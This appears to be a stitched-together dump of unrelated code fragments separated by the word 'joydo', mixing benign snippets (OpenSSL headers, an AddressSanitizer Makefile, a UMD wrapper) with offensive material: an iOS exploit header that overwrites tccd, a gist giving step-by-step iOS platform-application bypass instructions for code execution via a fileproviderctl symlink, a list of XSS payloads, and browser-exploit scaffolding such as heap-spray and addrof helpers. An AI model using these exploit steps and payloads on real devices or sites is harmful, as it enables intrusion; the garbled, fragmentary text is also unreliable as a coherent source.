joydo

#include <openssl/ecdsa.h>
#include <openssl/ecdh.h>
#include <openssl/evp.h>
#include <openssl/sha.h>
#include <openssl/bio.h>
#include <openssl/pem.h>

#include <iostream>
#include <string>
#include <cassert>

joydo

@import Darwin;
@import Foundation;
@import MachO;

#import <mach-o/fixup-chains.h>
// you'll need helpers.m from Ian Beer's write_no_write and vm_unaligned_copy_switch_race.m from
// WDBFontOverwrite
// Also, set an NSAppleMusicUsageDescription in Info.plist (can be anything)
// Please don't call this code on iOS 14 or below
// (This temporarily overwrites tccd, and on iOS 14 and above changes do not revert on reboot)

joydo

!(function (arg1, arg2) {
	if ("object" == typeof exports && "undefined" != typeof module) {
		arg2(exports);
	} else if ("function" == typeof define && define.amd) {
		define(["exports"], arg2);
	} else {
		arg2(
			((arg1 = "undefined" != typeof globalThis ? globalThis : arg1 || self).byted_acrawler =
				{})
		);

joydo

theme	class	highlighter	fonts
default	text-center	MaskRay	sans serif mono sans-serif serif monospace

joydo

.PHONY: using-gcc using-gcc-static using-clang

using-gcc:
	g++-4.8 -o main-gcc -lasan -O -g -fsanitize=address -fno-omit-frame-pointer main.cpp && \
	ASAN_OPTIONS=symbolize=1 ASAN_SYMBOLIZER_PATH=$(shell which llvm-symbolizer) ./main-gcc

using-gcc-static:
	g++-4.8 -o main-gcc-static -static-libstdc++ -static-libasan -O -g -fsanitize=address -fno-omit-frame-pointer main.cpp && \
	ASAN_OPTIONS=symbolize=1 ASAN_SYMBOLIZER_PATH=$(shell which llvm-symbolizer) ./main-gcc-static

joydo

i'll do a better release tomorrow or something, but to keep my promise, here's a gist
bug2:
platform-application bypass,
/usr/bin/fileproviderctl is a binary with a purpose i'm not sure of, however, it executes /usr/local/bin/fileproviderctl_internal when run
make /usr/local/bin/fileproviderctl_internal a symlink to your code to execute, and replace a daemon with /usr/bin/fileproviderctl
recommended to use wifiFirmwareLoader, and SUID fileproviderctl with mobile:mobile (if it runs as root containermanagerd has a seizure)
boom, BFU code exec on >11.xish -> 14.xish

bug3:
platform-application bypass,

joydo

%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">

joydo

function sleep( sleepDuration ){
    var now = new Date().getTime();
    while(new Date().getTime() < now + sleepDuration){ /* do nothing */ } 
}
function gc() {
    for (let i = 0; i < 0x10; i++) {
            new ArrayBuffer(0x1000000);
        }
}
let data_view = new DataView(new ArrayBuffer(8));

joydo

class Helpers {
    constructor() {
        this.buf = new ArrayBuffer(8);
        this.f64 = new Float64Array(this.buf);
        this.f32 = new Float32Array(this.buf);
        this.u32 = new Uint32Array(this.buf);
        this.u64 = new BigUint64Array(this.buf);
        this.state = {};
    }

joydo

class Helpers {
    constructor() {
        this.addrof_LO = new Array(1048577);

        this.buf = new ArrayBuffer(8);
        this.f64 = new Float64Array(this.buf);
        this.f32 = new Float32Array(this.buf);
        this.u32 = new Uint32Array(this.buf);
        this.u64 = new BigUint64Array(this.buf);
        this.state = {};